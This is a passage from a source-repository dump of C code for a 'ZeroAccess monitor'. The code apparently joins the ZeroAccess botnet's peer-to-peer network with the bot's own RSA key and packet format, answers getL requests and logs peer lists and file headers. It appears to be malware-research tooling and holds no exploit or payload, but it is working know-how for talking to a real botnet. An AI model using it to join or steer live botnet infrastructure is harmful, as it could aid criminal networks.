FALSE;\n\tSIZE_T              memIO;\n\tZA_PEERINFO         in_peer;\n\n\tRtlSecureZeroMemory(&textbuf, sizeof(textbuf));\n\t_strcpy(textbuf, TEXT(\"> p2p listener thread started, sid=0x\"));\n\tultohex(ScanContext->SessionId, _strend(textbuf));\n\tSfUIAddEvent(ScanContext, GUI_EVENT_THREAD_STARTED, textbuf);\n\n\tdo {\n\n\t\tmemIO = UDP_BUFFER_SIZE;\n\t\tNtAllocateVirtualMemory(NtCurrentProcess(), &recvbuffer, 0, &memIO, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\n\t\tif (recvbuffer == NULL)\n\t\t\tbreak;\n\n\t\tmemIO = UDP_BUFFER_SIZE;\n\t\tNtAllocateVirtualMemory(NtCurrentProcess(), &sendbuffer, 0, &memIO, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\n\t\tif (sendbuffer == NULL)\n\t\t\tbreak;\n\n\t\trecvpacket = (PZA_PACKET)recvbuffer;\n\t\tsendpacket = 
(PZA_PACKET)sendbuffer;\n\n\t\tdo {\n\n\t\t\tRtlSecureZeroMemory(&io_addr, sizeof(io_addr));\n\t\t\taddr_len = sizeof(io_addr);\n\t\t\trecv_bytes = recvfrom(ScanContext->su, recvbuffer, UDP_BUFFER_SIZE, 0, (struct sockaddr *)&io_addr, &addr_len);\n\t\t\tif (recv_bytes <= 0)\n\t\t\t\tcontinue;\n\n\t\t\tPort = ntohs(io_addr.sin_port);\n\t\t\t_strcpy(textbuf, TEXT(\"> received packet <- \"));\n\t\t\tRtlIpv4AddressToStringW((const struct in_addr*)&io_addr.sin_addr, _strend(textbuf));\n\t\t\t_strcat(textbuf, TEXT(\":\"));\n\t\t\tultostr(Port, _strend(textbuf));\n\t\t\tSfUIAddEvent(ScanContext, GUI_EVENT_PACKET_RECV, textbuf);\n\n\t\t\t//datagram too short to hold a packet header, header fields would be stale buffer data\n\t\t\tif (recv_bytes < (int)sizeof(recvpacket->Header)) {\n\t\t\t\tSfUIAddEvent(ScanContext, GUI_EVENT_ERROR, TEXT(\">> received packet is shorter than packet header\"));\n\t\t\t\tcontinue;\n\t\t\t}\n\n\t\t\tSfuDecodeStream((PBYTE)recvbuffer, recv_bytes, '1234');\n\t\t\tcrc = recvpacket->Header.CRC;\n\t\t\trecvpacket->Header.CRC = 0;\n\n\t\t\tif (RtlComputeCrc32(0, (PUCHAR)recvbuffer, recv_bytes) == crc) {\n\n\t\t\t\t_strcpy(textbuf, TEXT(\">> CRC-ok, cmd=\"));\n\t\t\t\tswitch (recvpacket->Header.Command) {\n\n\t\t\t\tcase 'getL':\n\t\t\t\t\t_strcat(textbuf, TEXT(\"getL\"));\n\t\t\t\t\tbreak;\n\t\t\t\tcase 'retL':\n\t\t\t\t\t_strcat(textbuf, TEXT(\"retL\"));\n\t\t\t\t\tbreak;\n\t\t\t\tdefault:\n\t\t\t\t\t_strcat(textbuf, TEXT(\"UnknownCmd\"));\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\t_strcat(textbuf, TEXT(\" size=\"));\n\t\t\t\tultostr(recv_bytes, _strend(textbuf));\n\t\t\t\t_strcat(textbuf, TEXT(\" sid=0x\"));\n\t\t\t\tultohex(recvpacket->Header.SessionID, _strend(textbuf));\n\t\t\t\t_strcat(textbuf, TEXT(\" opts=\"));\n\t\t\t\tultohex(recvpacket->Header.Opt1, _strend(textbuf));\n\t\t\t\t_strcat(textbuf, TEXT(\":\"));\n\t\t\t\tultohex(recvpacket->Header.Opt2, _strend(textbuf));\n\n\t\t\t\tif ((Port >= P2P_WIN32_PORT_RANGE_BEGIN) && (Port <= P2P_WIN32_PORT_RANGE_END)) {\n\t\t\t\t\t_strcat(textbuf, TEXT(\" (Win32 bot)\"));\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t\tif ((Port >= P2P_WIN64_PORT_RANGE_BEGIN) && (Port <= P2P_WIN64_PORT_RANGE_END)) {\n\t\t\t\t\t\t_strcat(textbuf, TEXT(\" (Win64 bot)\"));\n\t\t\t\t\t}\n\t\t\t\t\telse 
{\n\t\t\t\t\t\t_strcat(textbuf, TEXT(\" (Unknown bot port range)\"));\n\t\t\t\t\t}\n\n\t\t\t\tSfUIAddEvent(ScanContext, GUI_EVENT_PACKET_HEADER, textbuf);\n\n\t\t\t\tswitch (recvpacket->Header.Command) {\n\n\t\t\t\tcase 'getL':\n\n\t\t\t\t\tif ((recvpacket->Header.Opt2 & P2P_GETFILELIST) == 0) {\n\n\t\t\t\t\t\tsendpacket->Header.CRC = 0;\n\t\t\t\t\t\tsendpacket->Header.Command = 'retL';\n\t\t\t\t\t\tsendpacket->Header.SessionID = ScanContext->SessionId;\n\t\t\t\t\t\tsendpacket->Header.Opt1 = 0x0000;\n\t\t\t\t\t\tsendpacket->Header.Opt2 = recvpacket->Header.Opt2 & P2P_SESSION_MASK;\n\t\t\t\t\t\tRtlCopyMemory(&sendpacket->PeerList, ScanContext->LastPeerList, sizeof(sendpacket->PeerList));\n\t\t\t\t\t\tsendpacket->Header.CRC = RtlComputeCrc32(0, (PUCHAR)sendbuffer, sizeof(ZA_PACKET));\n\t\t\t\t\t\tSfuDecodeStream((PBYTE)sendbuffer, sizeof(ZA_PACKET), '1234');\n\t\t\t\t\t\tsendto(ScanContext->su, (const char *)sendbuffer, sizeof(ZA_PACKET), 0, (struct sockaddr *)&io_addr, addr_len);\n\t\t\t\t\t}\n\t\t\t\t\tbreak;\n\n\t\t\t\tcase 'retL':\n\n\t\t\t\t\t//a retL datagram must carry the whole fixed-size packet, otherwise PeerList is stale buffer data\n\t\t\t\t\tif ((ULONG)recv_bytes < sizeof(ZA_PACKET))\n\t\t\t\t\t\tbreak;\n\n\t\t\t\t\tRtlCopyMemory(ScanContext->LastPeerList, recvpacket->PeerList, sizeof(ScanContext->LastPeerList));\n\n\t\t\t\t\tin_peer.IP = io_addr.sin_addr.S_un.S_addr;\n\t\t\t\t\tin_peer.Port = Port;\n\t\t\t\t\tin_peer.TimeStamp = 0;\n\n\t\t\t\t\tfor (k = 0; k < recvpacket->Header.Opt1; k++) {\n\t\t\t\t\t\tl = sizeof(ZA_PACKET) + (k + 1)*sizeof(ZA_FILEHEADER);\n\t\t\t\t\t\tif (l <= (ULONG)recv_bytes)\n\t\t\t\t\t\t\tSfNAddFileHeader(\n\t\t\t\t\t\t\t\tScanContext, \n\t\t\t\t\t\t\t\t(PZA_FILEHEADER)(recvbuffer + sizeof(ZA_PACKET) + k*sizeof(ZA_FILEHEADER)),\n\t\t\t\t\t\t\t\t&in_peer\n\t\t\t\t\t\t\t\t);\n\t\t\t\t\t}\n\n\t\t\t\t\tfor (k = 0; k < 16; k++)\n\t\t\t\t\t\tSfNAddToTable(ScanContext, &recvpacket->PeerList[k]);\n\n\t\t\t\t\tbreak;\n\n\t\t\t\tdefault:\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\t\t\telse {\n\t\t\t\tSfUIAddEvent(ScanContext, GUI_EVENT_ERROR, TEXT(\">> 
received CRC mismatch, corrupted packet header\"));\n\t\t\t}\n\n\t\t} while (!g_guictx.bShutdown);\n\n\t} while (cond);\n\n\tif (recvbuffer != NULL) {\n\t\tmemIO = 0;\n\t\tNtFreeVirtualMemory(NtCurrentProcess(), &recvbuffer, &memIO, MEM_RELEASE);\n\t}\n\n\tif (sendbuffer != NULL) {\n\t\tmemIO = 0;\n\t\tNtFreeVirtualMemory(NtCurrentProcess(), &sendbuffer, &memIO, MEM_RELEASE);\n\t}\n\tSfUIAddEvent(ScanContext, GUI_EVENT_THREAD_TERMINATED, TEXT(\"Listener thread terminated.\"));\n\treturn 0;\n}\n\n/*\n* SfNWorkerThread\n*\n* Purpose:\n*\n* Scan worker thread.\n*\n*/\nVOID WINAPI SfNWorkerThread(\n\t_In_ PZA_SCANCTX ScanContext\n\t)\n{\n\tBOOL                        cond = FALSE;\n\tSIZE_T                      sz;\n\tSOCKET                      su = INVALID_SOCKET;\n\tHANDLE                      hThread = NULL, hFile = NULL;\n\tULONG                       nBootstrap = 0, k;\n\tNTSTATUS                    status;\n\tPVOID                       Wow64 = NULL;\n\tPZA_PEERINFO                Bootstrap = NULL;\n\tstruct sockaddr_in          io_addr;\n\tUNICODE_STRING              usName;\n\tOBJECT_ATTRIBUTES           ObjectAttributes;\n\tIO_STATUS_BLOCK             IoStatusBlock;\n\tFILE_STANDARD_INFORMATION   fsi;\n\tWCHAR                       szText[MAX_PATH];\n\tBOOLEAN                     NewElement = FALSE;\n\n\tRtlInitializeCriticalSection(&ScanContext->csTableLock);\n\tRtlInitializeCriticalSection(&ScanContext->csTableDumpLock);\n\n\tdo {\n\n\t\tif (!CryptAcquireContext(&ScanContext->CryptoProv, NULL, MS_DEF_PROV, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT))\n\t\t\tbreak;\n\n\t\tk = ~GetTickCount();\n\t\tScanContext->SessionId = RtlRandomEx(&k);\n\t\tif (!CryptGenRandom(ScanContext->CryptoProv, (DWORD)sizeof(ULONG), (BYTE*)&ScanContext->SessionId))\n\t\t\tbreak;\n\n\t\tif (!CryptImportKey(ScanContext->CryptoProv, (const BYTE *)RSA_KEY, sizeof(RSA_KEY), 0, 0, 
&ScanContext->CryptoKey))\n\t\t\tbreak;\n\n\n\t\tRtlInitializeGenericTableAvl(&ScanContext->PeersTable,\n\t\t\t(PRTL_AVL_COMPARE_ROUTINE)&SfAvlCompareCallback,\n\t\t\t(PRTL_AVL_ALLOCATE_ROUTINE)&SfAvlAllocateCallback,\n\t\t\t(PRTL_AVL_FREE_ROUTINE)&SfAvlFreeCallback,\n\t\t\t(PVOID)ScanContext);\n\n\t\tRtlInitializeGenericTableAvl(&ScanContext->PeersTableDump,\n\t\t\t(PRTL_AVL_COMPARE_ROUTINE)&SfAvlCompareCallback,\n\t\t\t(PRTL_AVL_ALLOCATE_ROUTINE)&SfAvlAllocateCallback,\n\t\t\t(PRTL_AVL_FREE_ROUTINE)&SfAvlFreeCallback,\n\t\t\t(PVOID)ScanContext);\n\n\t\t_strcpy(szText, TEXT(\"Loading bootstrap list \"));\n\t\t_strcat(szText, P2P_BOOTSTRAP_NAME);\n#ifdef _WIN64\n\t\t_strcat(szText, TEXT(\", running in x86-64 mode\"));\n#else\n\t\t_strcat(szText, TEXT(\", running in x86-32 mode\"));\n#endif\n\t\tSfUIAddEvent(NULL, GUI_EVENT_INFORMATION, szText);\n\t\t\n\t\tusName.Buffer = P2P_BOOTSTRAP_NAME;\n\t\tusName.Length = sizeof(P2P_BOOTSTRAP_NAME) - sizeof(WCHAR);\n\t\tusName.MaximumLength = usName.Length + sizeof(UNICODE_NULL);\n\t\tInitializeObjectAttributes(&ObjectAttributes, &usName, OBJ_CASE_INSENSITIVE, ScanContext->RootDirectoryHandle, NULL);\n\t\tif (!NT_SUCCESS(SfuLoadPeerList(&ObjectAttributes, &Bootstrap, &nBootstrap))) {\n\t\t\tSfUIAddEvent(NULL, GUI_EVENT_ERROR, TEXT(\"Could not read bootstrap peer list.\"));\n\t\t\tbreak;\n\t\t}\n\n\t\t_strcpy(szText, TEXT(\"Bootstrap loaded OK, peers count: \"));\n\t\tultostr(nBootstrap, _strend(szText));\n\t\tSfUIAddEvent(NULL, GUI_EVENT_INFORMATION, szText);\n\n\t\t_qsort(Bootstrap, nBootstrap, sizeof(ZA_PEERINFO), SfQSortCompare);\n\t\t//SfuWriteBufferToFile(L\"test64.bin\", Bootstrap, nBootstrap * sizeof(ZA_PEERINFO), FALSE, FALSE);\n\t\tfor (k = 0; k < nBootstrap; k++) {\n\t\t\tNewElement = FALSE;\n\t\t\tif (!RtlInsertElementGenericTableAvl(&ScanContext->PeersTable, &Bootstrap[k], sizeof(ZA_PEERINFO), &NewElement))\n\t\t\t\tbreak;\n\t\t}\n\n\t\tsz = 0;\n\t\tNtFreeVirtualMemory(NtCurrentProcess(), &Bootstrap, &sz, 
MEM_RELEASE);\n\t\tBootstrap = NULL;\n\n\t\t_strcpy(szText, TEXT(\"Loading dumped bootstrap list \"));\n\t\t_strcat(szText, P2P_BOOTSTRAP_SAVE_NAME);\n\t\tSfUIAddEvent(NULL, GUI_EVENT_INFORMATION, szText);\n\n\t\tusName.Buffer = P2P_BOOTSTRAP_SAVE_NAME;\n\t\tusName.Length = sizeof(P2P_BOOTSTRAP_SAVE_NAME) - sizeof(WCHAR);\n\t\tusName.MaximumLength = usName.Length + sizeof(UNICODE_NULL);\n\t\tstatus = NtCreateFile(&hFile, FILE_READ_ACCESS | FILE_WRITE_ACCESS | SYNCHRONIZE, &ObjectAttributes,\n\t\t\t&IoStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OPEN_IF,\n\t\t\tFILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0);\n\t\tif (!NT_SUCCESS(status)) {\n\t\t\tSfUIAddEvent(NULL, GUI_EVENT_ERROR, TEXT(\"Could not create output peer list.\"));\n\t\t\tbreak;\n\t\t}\n\t\tScanContext->DumpFileHandle = hFile;\n\n\t\tRtlSecureZeroMemory(&fsi, sizeof(fsi));\n\t\tif (NT_SUCCESS(NtQueryInformationFile(hFile, &IoStatusBlock, &fsi, sizeof(fsi), FileStandardInformation))) {\n\n\t\t\tsz = fsi.EndOfFile.LowPart;\n\t\t\tif ((sz % sizeof(ZA_PEERINFO)) == 0) {\n\n\t\t\t\tBootstrap = NULL;\n\t\t\t\tNtAllocateVirtualMemory(NtCurrentProcess(), &Bootstrap, 0, &sz, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);\n\t\t\t\tif (Bootstrap) {\n\t\t\t\t\tif (NT_SUCCESS(NtReadFile(hFile, NULL, NULL, NULL, &IoStatusBlock, Bootstrap, fsi.EndOfFile.LowPart, NULL, NULL))) {\n\t\t\t\t\t\tnBootstrap = fsi.EndOfFile.LowPart / sizeof(ZA_PEERINFO);\n\t\t\t\t\t\t\n\t\t\t\t\t\t_strcpy(szText, TEXT(\"Dump bootstrap loaded OK, peers count: \"));\n\t\t\t\t\t\tultostr(nBootstrap, _strend(szText));\n\t\t\t\t\t\tSfUIAddEvent(NULL, GUI_EVENT_INFORMATION, szText);\n\n\t\t\t\t\t\tfor (k = 0; k < nBootstrap; k++) {\n\t\t\t\t\t\t\tNewElement = FALSE;\n\t\t\t\t\t\t\tif (!RtlInsertElementGenericTableAvl(&ScanContext->PeersTableDump, &Bootstrap[k], sizeof(ZA_PEERINFO), &NewElement))\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tsz = 0;\n\t\t\t\t\tNtFreeVirtualMemory(NtCurrentProcess(), &Bootstrap, 
&sz, MEM_RELEASE);\n\t\t\t\t\tBootstrap = NULL;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tsu = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\n\t\tif (su == INVALID_SOCKET)\n\t\t\tbreak;\n\n\t\tScanContext->su = su;\n\n\t\tRtlSecureZeroMemory(&io_addr, sizeof(io_addr));\n\t\tio_addr.sin_family = AF_INET;\n\t\tio_addr.sin_port = htons((u_short)UDP_PORT);\n\t\tif (bind(su, (struct sockaddr *)&io_addr, sizeof(io_addr)) != 0)\n\t\t\tbreak;\n\n\t\tNtQueryInformationProcess(NtCurrentProcess(), ProcessWow64Information, &Wow64, sizeof(PVOID), NULL);\n\n\t\t_strcpy(szText, TEXT(\"ZeroAccess monitor, mode=\"));\n\t\tultostr((Wow64 != NULL) ? 32 : 64, _strend(szText));\n\t\t_strcat(szText, TEXT(\", port: \"));\n\t\tultostr(UDP_PORT, _strend(szText));\n\t\t_strcat(szText, TEXT(\", sid=0x\"));\n\t\tultohex(ScanContext->SessionId, _strend(szText));\n\t\t\n\t\tSetWindowText(g_guictx.MainWindow, szText);\n\n\t\thThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&SfNgetLSender, (LPVOID)ScanContext, 0, NULL);\n\t\tif (hThread != NULL) {\n\t\t\tCloseHandle(hThread);\n\t\t}\n\n\t\thThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&SfNP2PListener, (LPVOID)ScanContext, 0, NULL);\n\t\tif (hThread != NULL) {\n\t\t\tCloseHandle(hThread);\n\t\t}\n\n\t\twhile (g_guictx.bShutdown == FALSE) {\n\t\t\tSleep(1000);\n\t\t}\n\n\t} while (cond);\n\n\t//cleanup\n\n\tif (su != INVALID_SOCKET) {\n\t\tshutdown(su, SD_BOTH);\n\t\tclosesocket(su);\n\t}\n\n\tif (ScanContext->RootDirectoryHandle != NULL) {\n\t\tNtClose(ScanContext->RootDirectoryHandle);\n\t}\n\n\tif (ScanContext->DumpFileHandle != NULL) {\n\t\tNtClose(ScanContext->DumpFileHandle);\n\t}\n\n\tif (Bootstrap != NULL) {\n\t\tsz = 0;\n\t\tNtFreeVirtualMemory(NtCurrentProcess(), &Bootstrap, &sz, MEM_RELEASE);\n\t}\n\n\tif (ScanContext->CryptoKey) {\n\t\tCryptDestroyKey(ScanContext->CryptoKey);\n\t}\n\n\tif (ScanContext->CryptoProv) {\n\t\tCryptReleaseContext(ScanContext->CryptoProv, 
0);\n\t}\n\n\tRtlDeleteCriticalSection(&ScanContext->csTableLock);\n\tRtlDeleteCriticalSection(&ScanContext->csTableDumpLock);\n}\n\n/*\n* SfNStartup\n*\n* Purpose:\n*\n* Create/Open directories and start worker thread.\n*\n*/\nBOOL SfNStartup(\n\t_In_ ZA_SCANCTX *ScanContext\n\t)\n{\n\tUNICODE_STRING     usName;\n\tANSI_STRING        str;\n\tNTSTATUS           status;\n\tHANDLE             RootDirectoryHandle = NULL;\n\tIO_STATUS_BLOCK    IoStatusBlock;\n\tOBJECT_ATTRIBUTES  ObjectAttributes;\n\tPVOID              DllImageBase = NULL;\n\tBOOL               bResult = FALSE, cond = FALSE;\n\n\tRtlSecureZeroMemory(&usName, sizeof(usName));\n\n\tdo {\n\n\t\tRtlInitUnicodeString(&usName, L\"ntdll.dll\");\n\t\tif (NT_SUCCESS(LdrGetDllHandle(NULL, NULL, &usName, &DllImageBase))) {\n\t\t\tRtlInitString(&str, \"qsort\");\n\t\t\tLdrGetProcedureAddress(DllImageBase, &str, 0, (PVOID)&_qsort);\n\t\t\tif (_qsort == NULL) {\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\n\t\tbResult = RtlDosPathNameToNtPathName_U(\n\t\t\tRtlGetCurrentPeb()->ProcessParameters->CurrentDirectory.DosPath.Buffer,\n\t\t\t&usName, NULL, NULL\n\t\t\t);\n\t\tif (bResult == FALSE)\n\t\t\tbreak;\n\n\t\tInitializeObjectAttributes(&ObjectAttributes,\n\t\t\t&usName,\n\t\t\tOBJ_CASE_INSENSITIVE, 0, NULL);\n\n\t\tstatus = NtCreateFile(&RootDirectoryHandle,\n\t\t\tFILE_GENERIC_READ | FILE_GENERIC_WRITE,\n\t\t\t&ObjectAttributes,\n\t\t\t&IoStatusBlock,\n\t\t\tNULL,\n\t\t\tFILE_ATTRIBUTE_READONLY,\n\t\t\tFILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\n\t\t\tFILE_OPEN,\n\t\t\tFILE_DIRECTORY_FILE,\n\t\t\tNULL,\n\t\t\t0\n\t\t\t);\n\n\t\tRtlFreeUnicodeString(&usName);\n\n\t\tif (!NT_SUCCESS(status)) {\n\t\t\t//path conversion above set bResult to TRUE, reset it so a failed open is reported as failure\n\t\t\tbResult = FALSE;\n\t\t\tbreak;\n\t\t}\n\t\n\t\tusName.Buffer = L\"U\";\n\t\tusName.Length = 2;\n\t\tusName.MaximumLength = 4;\n\t\tObjectAttributes.RootDirectory = RootDirectoryHandle;\n\t\tbResult = SfuCreateDirectory(&ObjectAttributes);\n\t\tif (bResult) {\n\t\t\t/*we don't use*/\n\t\t\tusName.Buffer = L\"L\";\n\t\t\tObjectAttributes.RootDirectory = 
RootDirectoryHandle;\n\t\t\tbResult = SfuCreateDirectory(&ObjectAttributes);\n\t\t\tif (bResult == FALSE) {\n\t\t\t\tSfUIAddEvent(NULL, GUI_EVENT_ERROR, TEXT(\"Could not create working L directory.\"));\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t\telse {\n\t\t\tSfUIAddEvent(NULL, GUI_EVENT_ERROR, TEXT(\"Could not create working U directory.\"));\n\t\t\tbreak;\n\t\t}\n\n\t} while (cond);\n\n\tif (!bResult) {\n\t\tif (RootDirectoryHandle)\n\t\t\tNtClose(RootDirectoryHandle);\n\t}\n\telse {\n\t\tif (RootDirectoryHandle) {\n\t\t\tScanContext->RootDirectoryHandle = RootDirectoryHandle;\n\t\t}\n\t}\n\n\treturn bResult;\n}\n\n/*\n* SfNMain\n*\n* Purpose:\n*\n* Scan entry point.\n*\n*/\nVOID SfNMain(\n\tVOID\n\t)\n{\n\tHANDLE hThread;\n\n\tRtlSecureZeroMemory(&g_zascan, sizeof(g_zascan));\n\tSfNStartup(&g_zascan);\n\tif (SfInitMD5()) {\n\t\thThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&SfNWorkerThread, &g_zascan, 0, NULL);\n\t\tif (hThread) {\n\t\t\tCloseHandle(hThread);\n\t\t}\n\t}\n}\n"
  },
  {
    "path": "Source/Yuudachi/p2p.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016 - 2017\n*\n*  TITLE:       P2P.H\n*\n*  VERSION:     1.01\n*\n*  DATE:        01 Dec 2016\n*\n*  P2P header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n#include \"..\\shared\\global.h\"\n#include \"..\\shared\\za_rkey.h\"\n\n//some consts, we tested it and it looks ok (c)\n\n#define UDP_BUFFER_SIZE\t\t        4096\n#define MAXIMUM_FILES               32\n#define RECV_BUFFER_SIZE            262144\n\n//client udp port\n\n#ifdef _WIN64\n#define UDP_PORT                    45167\n#else\n#define UDP_PORT                    21833\n#endif\n\n//client tcp port\n#define TCP_PORT                    UDP_PORT\n\n//p2p protocol const\n\n#define P2P_GETFILELIST             0x8000\n#define P2P_SESSION_MASK            0x03ff\n\n//upd port possible ranges\n\n#define P2P_WIN32_PORT_RANGE_BEGIN  0x4000\n#define P2P_WIN32_PORT_RANGE_END    0x7fff\n#define P2P_WIN64_PORT_RANGE_BEGIN  0x8000\n#define P2P_WIN64_PORT_RANGE_END    0xbfff\n\n//udp port adjust value\n\n#ifdef _WIN64\n#define P2P_UDP_PORT_ADJUST         0x8000\n#else\n#define P2P_UDP_PORT_ADJUST         0x4000\n#endif\n\n//bootstrap\n\n#ifdef _WIN64\n#define P2P_BOOTSTRAP_NAME          TEXT(\"s64\")\n#else\n#define P2P_BOOTSTRAP_NAME          TEXT(\"s32\")\n#endif\n\n#ifdef _WIN64\n#define P2P_BOOTSTRAP_SAVE_NAME     TEXT(\"out64\")\n#else\n#define P2P_BOOTSTRAP_SAVE_NAME     TEXT(\"out32\")\n#endif\n\n//crypto key\n\n#ifdef _WIN64\n#define RSA_KEY                     ZA_key64\n#else\n#define RSA_KEY                     ZA_key32\n#endif\n\ntypedef struct _ZA_SCANCTX {\n    SOCKET              su;\n    
ULONG               NumberOfFiles;\n    ULONG               SessionId;\n    HCRYPTPROV          CryptoProv;\n    HCRYPTKEY           CryptoKey;\n    HANDLE              DumpFileHandle;\n    HANDLE              RootDirectoryHandle;\n    CRITICAL_SECTION    csTableLock;\n    CRITICAL_SECTION    csTableDumpLock;\n    RTL_AVL_TABLE       PeersTable;\n    RTL_AVL_TABLE       PeersTableDump;\n    ZA_PEERINFO\t        LastPeerList[16];\n    ZA_FILEHEADER       FileHeaders[MAXIMUM_FILES];\n} ZA_SCANCTX, *PZA_SCANCTX;\n\nBOOL SfNStartup(\n    _In_ ZA_SCANCTX *ScanContext\n);\n\nVOID SfNMain(\n    VOID\n);\n"
  },
  {
    "path": "Source/Yuudachi/za.manifest",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\n<assembly manifestVersion=\"1.0\" xmlns=\"urn:schemas-microsoft-com:asm.v1\" xmlns:asmv3=\"urn:schemas-microsoft-com:asm.v3\">\n    <assemblyIdentity \n        type=\"win32\" \n        name=\"ZeroAccess\"\n        version=\"1.0.0.0\"\n        processorArchitecture=\"*\"\n    />\n    <description> ZeroAccess </description>\n    <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\n        <security>\n            <requestedPrivileges>\n                <requestedExecutionLevel\n                    level=\"asInvoker\"\n                    uiAccess=\"false\"\n                />\t\n            </requestedPrivileges>\n        </security>\n    </trustInfo>\n    <compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\"> \n        <application> \n            <!-- Windows 10 --> \n            <supportedOS Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/>\n            <!-- Windows 8.1 -->\n            <supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/>\n            <!-- Windows Vista -->\n            <supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/> \n            <!-- Windows 7 -->\n            <supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/>\n            <!-- Windows 8 -->\n            <supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/>\n        </application> \n    </compatibility>\n\n  <dependency>\n    <dependentAssembly>\n      <assemblyIdentity                 \n        type=\"win32\"\n        name=\"Microsoft.Windows.Common-Controls\"\n        version=\"6.0.0.0\"\n        publicKeyToken=\"6595b64144ccf1df\"\n        language=\"*\"\n        processorArchitecture=\"*\"\n        />\n    </dependentAssembly>\n  </dependency>\n\n</assembly>"
  },
  {
    "path": "Source/ZeroAccess.sln",
    "content": "﻿\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio 14\nVisualStudioVersion = 14.0.24720.0\nMinimumVisualStudioVersion = 10.0.40219.1\nProject(\"{2150E333-8FDC-42A3-9474-1A3956D46DE8}\") = \"minirtl\", \"minirtl\", \"{ED3257FC-CB8E-4406-8BCE-F3E5500B41F8}\"\n\tProjectSection(SolutionItems) = preProject\n\t\tminirtl\\_filename.c = minirtl\\_filename.c\n\t\tminirtl\\_filename.h = minirtl\\_filename.h\n\t\tminirtl\\_strcat.c = minirtl\\_strcat.c\n\t\tminirtl\\_strcmp.c = minirtl\\_strcmp.c\n\t\tminirtl\\_strcmpi.c = minirtl\\_strcmpi.c\n\t\tminirtl\\_strcpy.c = minirtl\\_strcpy.c\n\t\tminirtl\\_strend.c = minirtl\\_strend.c\n\t\tminirtl\\_strlen.c = minirtl\\_strlen.c\n\t\tminirtl\\_strncmp.c = minirtl\\_strncmp.c\n\t\tminirtl\\_strncmpi.c = minirtl\\_strncmpi.c\n\t\tminirtl\\_strncpy.c = minirtl\\_strncpy.c\n\t\tminirtl\\_strstr.c = minirtl\\_strstr.c\n\t\tminirtl\\_strstri.c = minirtl\\_strstri.c\n\t\tminirtl\\cmdline.c = minirtl\\cmdline.c\n\t\t..\\minirtl\\cmdline.h = ..\\minirtl\\cmdline.h\n\t\tminirtl\\cmdline.h = minirtl\\cmdline.h\n\t\tminirtl\\hextou64.c = minirtl\\hextou64.c\n\t\tminirtl\\hextoul.c = minirtl\\hextoul.c\n\t\tminirtl\\i64tostr.c = minirtl\\i64tostr.c\n\t\tminirtl\\itostr.c = minirtl\\itostr.c\n\t\t..\\minirtl\\minirtl.h = ..\\minirtl\\minirtl.h\n\t\tminirtl\\minirtl.h = minirtl\\minirtl.h\n\t\t..\\minirtl\\rtltypes.h = ..\\minirtl\\rtltypes.h\n\t\tminirtl\\rtltypes.h = minirtl\\rtltypes.h\n\t\tminirtl\\strtoi.c = minirtl\\strtoi.c\n\t\tminirtl\\strtoi64.c = minirtl\\strtoi64.c\n\t\tminirtl\\strtou64.c = minirtl\\strtou64.c\n\t\tminirtl\\strtoul.c = minirtl\\strtoul.c\n\t\tminirtl\\u64tohex.c = minirtl\\u64tohex.c\n\t\tminirtl\\u64tostr.c = minirtl\\u64tostr.c\n\t\tminirtl\\ultohex.c = minirtl\\ultohex.c\n\t\tminirtl\\ultostr.c = minirtl\\ultostr.c\n\tEndProjectSection\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"Umikaze\", \"Umikaze\\Umikaze.vcxproj\", 
